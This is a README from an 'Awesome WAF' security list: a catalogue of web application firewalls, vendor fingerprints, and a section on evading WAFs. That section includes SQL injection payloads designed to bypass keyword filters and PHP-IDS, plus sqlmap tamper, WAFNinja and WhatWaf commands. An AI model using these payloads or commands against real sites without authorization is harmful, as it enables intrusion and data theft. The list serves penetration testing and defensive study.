Awesome-WAF/README.md
2019-02-07 18:26:10 +05:30

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Awesome WAF Awesome

A curated list of awesome WAF stuff.

NOTE: This awesome list is a work in progress list. Have a watch out there! :)

Main Logo

A Concise Definition: A web application firewall is a form of firewall with a set of configured rules that controls input, output, and/or access from, to, or by an application or service. It operates by monitoring and potentially blocking the input, output, or system service calls that do not meet the configured policy of the firewall. (Source Wikipedia)

Feel free to contribute.

Contents:

Awesome WAFs List

360 WangZhanBao A WAF solution from 360 Security Team.
Airlock The Airlock Web Application Firewall offers a unique combination of protective mechanisms for web applications. Each access is systematically monitored and filtered at every level. It features reverse proxy, central checkpoint, filtering, API security and dynamic whitelisting.
Anquanbao A cloud based WAF solution for enterprises featuring big data analysis, clustering solutions, content optimisations, and access accelerations.
Armor A virtual WAF solution by Armor technologies which protects web-applications from OWASP top 10 attacks and features accurate response and remediation via applied intelligence from their threat centre.
Application Security Manager A comprehensive web application firewall from F5 Networks that protects apps and data from known and unknown threats, defends against bots that bypass standard protections, and virtually patches app vulnerabilities.
Amazon AWS WAF A WAF solution from Amazon AWS that features full time web-traffic filtering, virtual patching, traffic visibility, attack transparency integrated with customisable rules.
Baidu Cloud WAF A cloud based protection system from Baidu to effectively defend against web application attacks. It features cloud based real-time protections, load balancing, DDoS protection and its own content-delivery network.
Barracuda A WAF solution from Barracuda Networks featuring web aplication, API, and mobile apps against various attacks. Beside it provides DDoS protections, automated attack and bot protections, access controls and authentication protections.
BinarySEC A solution from BinarySec which provides all round security protections from many kinds of threats. BinarySec WAF allows active whitelisting while peotecting your site from major known threats and malware.
BlockDoS A WAF solution which features high performance in-built content delivery systems, custom SSL, DNS protection, dynamic caching and stable DDoS protection.
ChinaCache A featured firewall for China which features its own content-delivery network, virtual patching and constant threat discovery transparency report.
Kona Site Defender A cloud based WAF solution from Akamai technologies that feaures a proprietary WAF rule set, created and automatically updated based on visibility into the latest attacks with protections. It provides API security integrated with DevOps security, report visibility, etc.

Testing Methodology

Alright, now lets see the approach of testing WAFs. Wait, before that we need to know how they work right? Here you go.

How WAFs Work:

  • Using a set of rules to distinguish between normal requests and malicious requests.
  • Sometimes they use a learning mode to add rules automatically through learning about user behaviour.

Operation Modes:

  • Negative Model (Blacklist based) - One that defines what is not allowed. Eg. Block all <script>*</script> inputs.
  • Positive Model (Whitelist based) - One that defines what is allowed and rejects everything else.
  • Mixed/Hybrid Model (Inclusive model) - One that uses a mixed concept of blacklisting and whitelisting stuff.

Where To Look:

  • Always look out for common ports that expose that a WAF 80, 443, 8000, 8008, 8080, 8088.

    Tip: You can use automate this easily by commandline using a screenshot taker like WebScreenShot.

  • Some WAFs set their own cookies in requests (eg. Citrix Netscaler, Yunsuo WAF).
  • Some associate themselves with separate headers (eg. Anquanbao WAF, Amazon AWS WAF).
  • Some often alter headers and jumble characters to confuse attacker (eg. Citrix Netscaler, Big IP WAF).
  • Some (often rare) expose themselves in the Server header
  • Some WAFs expose themselves in the response content (eg. DotDefender, Armor, truShield Sitelock).
  • Other WAFs reply with unusual response codes upon malicious requests (eg. WebKnight).

Detection Techniques:

  1. Make a normal GET request from a browser, intercept and test response headers (specifically cookies).
  2. Make a request from command line (eg. cURL), and test response content and headers (no user-agent included).
  3. If there is a login page somewhere, try some common (easily detectable) payloads like ' or 1 = 1 --.
  4. If there is some search box or input field somewhere, try detecting payloads like <script>alert()</script>.
  5. Make GET requests with outdated protocols like HTTP/0.9 (HTTP/0.9 does not support POST type queries).
  6. Many a times, the WAF varies the Server header upon different types of interactions.
  7. Drop Action Technique - Send a raw crafted FIN/RST packet to server and identify response.

    Tip: This method could be easily achieved with tools like HPing3 or Scapy.

  8. Side Channel Attacks - Examine the timing behaviour of the request and response content.

WAF Detection

Wanna detect WAFs? Lets see how.

Note

: This section contains manual WAF detection techniques. You might want to switch over to next section.

360 Firewall
  • Detectability: Easy
  • Detection Methodology:
    • Returns status code 493 upon unusual requests.
    • On viewing source-code of error page, you will find reference to wzws-waf-cgi/ directory.
    • Source code may contain reference to wangshan.360.cn URL.
    • Response headers contain X-Powered-By-360WZB Header.
aeSecure
  • Detectability: Moderate
  • Detection Methodology:
    • Blocked response content contains aesecure_denied.png image (view source to see).
    • Response headers contain aeSecure-code value.
Airlock (Phion/Ergon)
  • Detectability: Moderate/Difficult
  • Detection Methodology:
    • Set-Cookie headers may contain AL-SESS={some value} value (case insensitive).
    • Response headers may contain AL-LB={some value} value (case insensitive).
Anquanbao WAF
  • Detectability: Easy
  • Detection Methodology:
    • Returns blocked HTTP response code 405 upon malicious requests.
    • Blocked response content may contain /aqb_cc/error/ or hidden_intercept_time.
    • Response headers contain X-Powered-by-Anquanbao header field.
Armor Defense
  • Detectability: Easy
  • Detection Methodology:
    • Blocked response content contains warning
      This request has been blocked by website protection from Armor.
Application Security Manager (F5 Networks)
  • Detectability: Difficult
  • Detection Methodology:
    • Blocked response content contains warning
      The requested URL was rejected. Please consult with your administrator.
Amazon AWS WAF
  • Detectability: Moderate
  • Detection Methodology:
    • Response headers contain AWS value.
    • Blocked response status code return 403 Forbidden response.
Yunjiasu WAF (Baidu)
  • Detectability: Moderate
  • Detection Methodology:
    • Response headers contain Yunjiasu-ngnix value.
Barracuda WAF
  • Detectability: Moderate
  • Detection Methodology:
    • Response cookies may contain barra_counter_session value.
    • Response headers may contain barracude_ keyword.
Bekchy (Faydata)
  • Detectability: Easy
  • Detection Methodology:
    • Blocked response headers contains Bekchy - Access Denied text.
    • Blocked response page contains reference to https://bekchy.com/report.
BitNinja
  • Detectability: Easy
  • Detection Methodology:
    • Blocked response page may contain:
      • Security check by BitNinja text.
      • your IP will be removed from BitNinja.
      • Visitor anti-robot validation text.
Bluedon IST
  • Detectability: Easy
  • Detection Methodology:
    • Server header contains BDWAF field value.
    • Blocked response page contains to Bluedon Web Application Firewall text.
BIG-IP ASM (F5 Networks)
  • Detectability: Moderate
  • Detection Methodology:
    • Response headers may contain BigIP or F5 keyword value.
    • Response header fields may contain X-WA-Info header.
    • Response headers might have jumbled X-Cnection field value.
BinarySec WAF
  • Detectability: Moderate
  • Detection Methodology:
    • Response headers contain binarysec keyword value.
BlockDos
  • Detectability: Moderate
  • Detection Methodology:
    • Response headers may contain reference to BlockDos.net URL.
ChinaCache Firewall
  • Detectability: Easy
  • Detection Methodology:
    • Response headers contain Powered-by-ChinaCache field.
    • Blocked response codes contain 400 Bad Request error upon malicious request.
ACE XML Gateway (Cisco)
  • Detectability: Moderate
  • Detection Methodology:
    • Response headers have ACE XML Gateway value.
Cloudbric
  • Detectability: Moderate
  • Detection Methodology:
    • Response content has Cloudbric and Malicious Code Detected texts.
Cloudflare
  • Detectability: Easy
  • Detection Methodology:
    • Response headers might have cf-ray field value.
    • Server header field has value cloudflare.
    • Set-Cookie response headers have __cfuid= cookie field.
    • Page content might have Attention Required! or Cloudflare Ray ID:.
    • You may encounter CLOUDFLARE_ERROR_500S_BOX upon hitting invalid URLs.
Cloudfront (Amazon)
  • Detectability: Easy
  • Detection Methodology:
    • Blocked response content contains Error from cloudfront error upon malicious request.
Comodo Firewall
  • Detectability: Easy
  • Detection Methodology:
    • Response headers contain Protected by COMODO WAF value.
CrawlProtect (Jean-Denis Brun)
  • Detectability: Easy
  • Detection Methodology:
    • Response content contains value
      This site is protected by CrawlProtect.
GoDaddy Firewall
  • Detectability: Easy
  • Detection Methodology:
    • Blocked response page contains value
      Access Denied - GoDaddy Website Firewall.
IBM WebSphere DataPower
  • Detectability: Difficult
  • Detection Methodology:
    • Response headers contains field value value X-Backside-Transport with value OK or FAIL.
Deny-All Firewall
  • Detectability: Difficult
  • Detection Methodology:
    • Response content contains value Condition Intercepted.
    • Set-Cookie header contains cookie field sessioncookie.
Distil Firewall
  • Detectability: Easy
  • Detection Methodology:
    • Response headers contain field value X-Distil-CS in all requests.
DoSArrest Internet Security
  • Detectability: Easy
  • Detection Methodology:
    • Response headers contain field value X-DIS-Request-ID.
    • Response headers might contain DOSarrest keyword.
dotDefender
  • Detectability: Easy
  • Detection Methodology:
    • Blocked response content contains value
      dotDefender Blocked Your Request.
    • Blocked response headers contain X-dotDefender-denied field value.
EdgeCast (Verizon)
  • Detectability: Easy
  • Detection Methodology:
    • Blocked response content contains value
      Please contact the site administrator, and provide the following Reference ID:EdgeCast Web Application Firewall (Verizon).
    • Blocked response code returns 400 Bad Request on malicious requests.
Expression Engine (EllisLab)
  • Detectability: Difficult
  • Detection Methodology:
    • Blocked response content contains value Invalid GET Request upon malicious GET queries.
    • Blocked POST type queries contain Invalid POST Request in response content.
FortiWeb Firewall
  • Detectability: Moderate
  • Detection Methodology:
    • Blocked response content contains value .fgd_icon keyword.
    • Response headers contain FORTIWAFSID= on malicious requests.
    • Set-Cookie header has cookie field cookiesession1=.
GreyWizard Firewall
  • Detectability: Easy
  • Detection Methodology:
    • Blocked response page content contains:
      We've detected attempted attack or non standard traffic from your IP address text.
    • Blocked response page title contains Grey Wizard keyword.
    • Response headers contain greywizard keyword.
HyperGuard Firewall
  • Detectability: Difficult
  • Detection Methodology:
    • Set-Cookie header has cookie field ODSESSION= in response headers.
Imperva SecureSphere
  • Detectability: Easy
  • Detection Methodology:
    • Blocked response page content may contain:
      • Incapsula incident ID keyword.
      • _Incapsula_Resource keyword.
      • subject=WAF Block Page keyword.
    • Normal GET request headers contain visid_incap value.
    • Response headers may contain X-Iinfo header field name.
    • Set-Cookie header has cookie field incap_ses in response headers.
Immunify360 (CloudLinux Inc.)
  • Detectability: Easy
  • Detection Methodology:
    • Headers contain imunify360 keyword.
    • Response page contains:
      • Powered by Imunify360 text.
      • imunify360 preloader if response type is JSON.
    • Blocked response page contains protected by Imunify360 text.
Janusec Application Gateway
  • Detectability: Moderate
  • Detection Methodology:
    • Blocked response page displays Janusec Application Gateway on malicious requests.
Jiasule Firewall
  • Detectability: Easy
  • Detection Methodology:
    • Blocked response page contains reference to static.jiasule.com/static/js/http_error.js URL.
    • Set-Cookie header has cookie field __jsluid= in response headers.
    • Response headers have jiasule-WAF or jsl_tracking keywords.
    • Blocked response content has notice-jiasule keyword.
KnownSec Firewall
  • Detectability: Moderate
  • Detection Methodology:
    • Blocked response page displays ks-waf-error.png image (view source to see).
KONA Site Defender (Akamai)
  • Detectability: Easy
  • Detection Methodology:
    • Headers contain AkamaiGHost keyword.
ModSecurity (Trustwave)
  • Detectability: Moderate/Difficult
  • Detection Methodology:
    • Blocked response page contains:
      • This error was generated by Mod_Security text.
      • One or more things in your request were suspicious text.
      • rules of the mod_security module text.
    • Response headers may contain Mod_Security or NYOB keywords.
NAXSI (NBS Systems)
  • Detectability: Easy
  • Detection Methodology:
    • Response headers contain naxsi/waf keyword.
Netcontinuum (Barracuda)
  • Detectability: Moderate
  • Detection Methodology:
    • Session cookies contain NCI__SessionId= cookie field name.
Citrix NetScaler
  • Detectability: Moderate
  • Detection Methodology:
    • Response headers may contain
      • Connection: header field name jumbled to nnCoection:
      • ns_af= cookie field name.
      • citrix_ns_id field name.
      • NSC_ keyword.
      • NS-CACHE field value.
NewDefend Firewall
  • Detectability: Easy
  • Detection Methodology:
    • Response headers contain newdefend keyword.
NSFocus Firewall
  • Detectability: Easy
  • Detection Methodology:
    • Response headers contain NSFocus keyword.
Palo Alto Firewall
  • Detectability: Difficult
  • Detection Methodology:
    • Blocked response page contains the following text
      has been blocked in accordance with company policy.
PerimeterX Firewall
  • Detectability: Easy
  • Detection Methodology:
    • Blocked response page contains reference to
      https://www.perimeterx.com/whywasiblocked URL.
Profense Firewall
  • Detectability: Moderate/Difficult
  • Detection Methodology:
    • Set-Cookie headers contain PLBSID= cookie field name.
    • Response headers may contain Profense keyword.
Radware Appwall
  • Detectability: Moderate
  • Detection Methodology:
    • Response page contains the following text:
      Unauthorized Activity Has Been Detected. and Case Number text.
    • Response headers may contain X-SL-CompState header field name.
Reblaze Firewall
  • Detectability: Moderate
  • Detection Methodology:
    • Response headers contain rbzid= header field name.
    • Response headers field values might contain Reblaze Secure Web Gateway text.
Request Validation Mode (ASP.NET)
  • Detectability: Easy
  • Detection Methodology:
    • A firewall found specifically on ASP.NET websites and none others.
    • Response page contains either of the following text:
      • ASP.NET has detected data in the request that is potentially dangerous.
      • Request Validation has detected a potentially dangerous client input value.
      • HttpRequestValidationException.
    • Blocked response code returned is always 500 Internal Error.
RSFirewall (RSJoomla)
  • Detectability: Easy
  • Detection Methodology:
    • Response page contains:
      • COM_RSFIREWALL_403_FORBIDDEN keyword.
      • COM_RSFIREWALL_EVENT keyword.
Safe3 Firewall
  • Detectability: Easy
  • Detection Methodology:
    • Response headers contain Safe3 keyword.
SafeDog Firewall
  • Detectability: Easy/Moderate
  • Detection Methodology:
    • Response headers may contain:
      • WAF/2.0 keyword.
      • safedog field value.
SecureIIS (BeyondTrust)
  • Detectability: Easy
  • Detection Methodology:
    • Response page contains either of the following text:
      • SecureIIS Web Server Protection.
      • Reference to http://www.eeye.com/SecureIIS/ URL.
      • subject={somevalue} SecureIIS Error text.
SEnginx (Neusoft)
  • Detectability: Easy
  • Detection Methodology:
    • Blocked response page contains SENGINX-ROBOT-MITIGATION keyword.
ShieldSecurity
  • Detectability: Difficult
  • Detection Methodology:
    • Blocked response page contains
      Something in the URL, Form or Cookie data wasn't appropriate text.
SiteLock TrueShield
  • Detectability: Easy
  • Detection Methodology:
    • Blocked response page source contains the following:
      • SiteLock Incident ID text.
      • sitelock-site-verification keyword.
      • sitelock_shield_logo image.
SonicWall (Dell)
  • Detectability: Easy
  • Detection Methodology:
    • Response headers contain SonicWALL keyword value.
    • Blocked response page contains either of the following text:
      • This request is blocked by the SonicWALL.
      • #shd or #nsa_banner hashtags.
      • Web Site Blocked text.
Sophos UTM Firewall
  • Detectability: Easy
  • Detection Methodology:
    • Blocked response page contains Powered by UTM Web Protection keyword.
Stingray (RiverBed/Brocade)
  • Detectability: Difficult
  • Detection Methodology:
    • Blocked response code returns 403 Forbidden or 500 Internal Error.
    • Response headers contain the X-Mapping header field name.
Sucuri CloudProxy
  • Detectability: Easy
  • Detection Methodology:
    • Response headers may contain Sucuri or Cloudproxy values.
    • Blocked response page contains the following text:
      • Access Denied and Sucuri Website Firewall texts.
      • Email cloudproxy@sucuri.net.
    • Returns 403 Forbidden response code upon blocking.
Tencent Cloud WAF
  • Detectability: Moderate
  • Detection Methodology:
    • Blocked response code returns 405 Method Not Allowed error.
    • Blocked response page contains reference to waf.tencent-cloud.com URL.
TrafficShield (F5 Networks)
  • Detectability: Moderate
  • Detection Methodology:
    • Response headers might contain F5-TrafficShield keyword.
    • ASINFO= value might be detected in response headers.
URLScan (Microsoft)
  • Detectability: Moderate
  • Detection Methodology:
    • Response headers might contain Rejected-by-URLScan field value.
    • Blocked response page contains Rejected-by-URLScan text.
USP Secure Entry
  • Detectability: Moderate
  • Detection Methodology:
    • Response headers contain Secure Entry Server field value.
Varnish (OWASP)
  • Detectability: Easy
  • Detection Methodology:
    • Response page contains Request rejected by xVarnish-WAF text.
    • Malicious request returns 404 Not Found Error.
VirusDie Firewall
  • Detectability: Easy
  • Detection Methodology:
    • Response page contains:
      • http://cdn.virusdie.ru/splash/firewallstop.png picture.
      • copy; Virusdie.ru

        text.
      • Response page title contains Virusdie keyword.
      • Page metadata contains name="FW_BLOCK" keyword
WallArm (Nginx)
  • Detectability: Moderate
  • Detection Methodology:
    • Response headers contain nginx-wallarm text.
WatchGuard Firewall
  • Detectability: Moderate
  • Detection Methodology:
    • Response headers contain WatchGuard header field value.
WebKnight (Aqtronix)
  • Detectability: Easy
  • Detection Methodology:
    • Response headers contain WebKnight keyword.
    • Blocked response page contains:
      • WebKnight Application Firewall Alert text warning.
      • AQTRONIX WebKnight text.
    • Blocked response code returned is 999 No Hacking. :p
WP Cerber Firewall
  • Detectability: Moderate
  • Detection Methodology:
    • Blocked response page contains:
      • We're sorry, you are not allowed to proceed text.
      • Your request looks suspicious or similar to automated requests from spam posting software warning.
Yundun Firewall
  • Detectability: Moderate
  • Detection Methodology:
    • Headers contain the yundun keyword.
Yunsuo Firewall
  • Detectability: Easy
  • Detection Methodology:
    • Blocked response page contains image class reference to .yunsuologo.
    • Response headers contain the yunsuo_session field name.
ZenEdge Firewall
  • Detectability: Easy
  • Detection Methodology:
    • Blocked response page contains reference to zenedge/assets/ directory.
    • Headers contain the ZENEDGE keyword.

Evasion Techniques

Lets look at some methods of bypassing and evading WAFs.

Fuzzing/Bruteforcing:

Method:

Running a set of payloads against the URL/endpoint. Some nice fuzzing wordlists:

  • Wordlists specifically for fuzzing - Seclists Fuzzing.
  • Can be done with automated tools like BurpSuite Intruder.

Technique:

  • Load up your wordlist into Burp Intruder/custom fuzzer and start the bruteforce.
  • Record/log all responses from the different payloads fuzzed.
  • Use random user-agents, ranging from Chrome Desktop to iPhone browser.
  • If blocking noticed, increase fuzz latency (eg. 2-4 secs)
  • Always use proxies, since chances are real that your IP gets blocked.

Drawback:

  • This method often fails.
  • Many a times your IP will be blocked (temporarily/permanently).

Regex-Reversing:

Method:

  • Most efficient method of bypassing WAFs.
  • Some WAFs rely upon matching the attack payloads with the signatures in their databases.
  • Payload matches the reg-ex the WAF triggers alarm.

Techniques:

• Step 1:

Keyword filer: and, or, union
Possible PHP Filter Code: preg_match('/(and|or|union)/i', $id)

  • Filtered Injection: union select user, password from users
  • Bypassed Injection: 1 || (select user from users where user_id = 1) = 'admin'
• Step 2:

Keyword filer: and, or, union, where
Possible PHP Filter Code: preg_match('/(and|or|union|where)/i', $id)

  • Filtered Injection: 1 || (select user from users where user_id = 1) = 'admin'
  • Bypassed Injection: 1 || (select user from users limit 1) = 'admin'
• Step 3:

Keyword filer: and, or, union, where, limit
Possible PHP Filter Code: preg_match('/(and|or|union|where|limit)/i', $id)

  • Filtered Injection: 1 || (select user from users limit 1) = 'admin'
  • Bypassed Injection: 1 || (select user from users group by user_id having user_id = 1) = 'admin'
• Step 4:

Keyword filer: and, or, union, where, limit, group by
Possible PHP Filter Code: preg_match('/(and|or|union|where|limit|group by)/i', $id)

  • Filtered Injection: 1 || (select user from users group by user_id having user_id = 1) = 'admin'
  • Bypassed Injection: 1 || (select substr(group_concat(user_id),1,1) user from users ) = 1
• Step 5:

Keyword filer: and, or, union, where, limit, group by, select
Possible PHP Filter Code: preg_match('/(and|or|union|where|limit|group by|select)/i', $id)

  • Filtered Injection: 1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1
  • Bypassed Injection: 1 || 1 = 1 into outfile 'result.txt'
  • Bypassed Injection: 1 || substr(user,1,1) = 'a'
• Step 6:

Keyword filer: and, or, union, where, limit, group by, select, '
Possible PHP Filter Code: preg_match('/(and|or|union|where|limit|group by|select|\')/i', $id)

  • Filtered Injection: 1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1
  • Bypassed Injection: 1 || user_id is not null
  • Bypassed Injection: 1 || substr(user,1,1) = 0x61
  • Bypassed Injection: 1 || substr(user,1,1) = unhex(61)
• Step 7:

Keyword filer: and, or, union, where, limit, group by, select, ', hex
Possible PHP Filter Code: preg_match('/(and|or|union|where|limit|group by|select|\'|hex)/i', $id)

  • Filtered Injection: 1 || substr(user,1,1) = unhex(61)
  • Bypassed Injection: 1 || substr(user,1,1) = lower(conv(11,10,36))
• Step 8:

Keyword filer: and, or, union, where, limit, group by, select, ', hex, substr
Possible PHP Filter Code: preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr)/i', $id)

  • Filtered Injection: 1 || substr(user,1,1) = lower(conv(11,10,36))
  • Bypassed Injection: 1 || lpad(user,7,1)
• Step 9:

Keyword filer: and, or, union, where, limit, group by, select, ', hex, substr, white space
Possible PHP Filter Code: preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr|\s)/i', $id)

  • Filtered Injection: 1 || lpad(user,7,1)
  • Bypassed Injection: 1%0b||%0blpad(user,7,1)

PHP-IDS generally blocks input containing = or ( or ' following with any a string or integer e.g. 1 or 1=1, 1 or '1', 1 or char(97). However, it can be bypassed using a statement that does not contain =, ( or ' symbols.

Scenario 1:

  • Filtered Injection: 1 or 1 = 1
  • Bypassed Injection: 1 or 1

Scenario 2:

  • Filtered injection: 1 union select 1, table_name from information_schema.tables where table_name = 'users'
  • Filtered Injection: 1 union select 1, table_name from information_schema.tables where table_name between 'a' and 'z'
  • Filtered Injection: 1 union select 1, table_name from information_schema.tables where table_name between char(97) and char(122)
  • Bypassed Injection: 1 union select 1, table_name from information_schema.tables where table_name between 0x61 and 0x7a
  • Bypassed Injection: 1 union select 1, table_name from information_schema.tables where table_name like 0x7573657273

Drawbacks:

  • This method is time consuming.

Google Dorks Approach:

Awesome Tools

WAF Fingerprinting:

1. Fingerprinting with NMap:

Source: GitHub | SVN

  • Normal WAF Fingerprinting
nmap --script=http-waf-fingerprint <target>
  • Intensive WAF Fingerprinting
nmap --script=http-waf-fingerprint  --script-args http-waf-fingerprint.intensive=1 <target>
  • Generic Detection
nmap --script=http-waf-detect <target>

2. Fingerprinting with WafW00f:

Source: GitHub | Pypi

wafw00f <target>

WAF Testing:

WAF Evading:

1. Evading WAFs with SQLMap Tamper Scripts:

  • General Tamper Testing
sqlmap -u <target> --level=5 --risk=3 -p 'item1' --tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes
  • MSSQL Tamper Testing
sqlmap -u <target> --level=5 --risk=3 -p 'item1' --tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes
  • MySQL Tamper Testing
sqlmap -u <target> --level=5 --risk=3 -p 'item1' --tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor
  • Generic Tamper Testing
sqlmap -u <target> --level=5 --risk=3 -p 'item1' --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords

2. Evading WAFs with WAFNinja

Source: GitHub

  • Fuzzing
python wafninja.py fuzz -u <target> -t xss
  • Bypassing
python wafninja.py bypass -u <target> -p "name=<payload>&Submit=Submit" -t xss
  • Insert Fuzzing
python wafninja.py insert-fuzz -i select -e select -t sql

3. Evading WAFs with WhatWaf:

Source: GitHub

whatwaf -u <target> --ra --throttle 2

Presentations & Research Papers

Research Papers:

Presentations: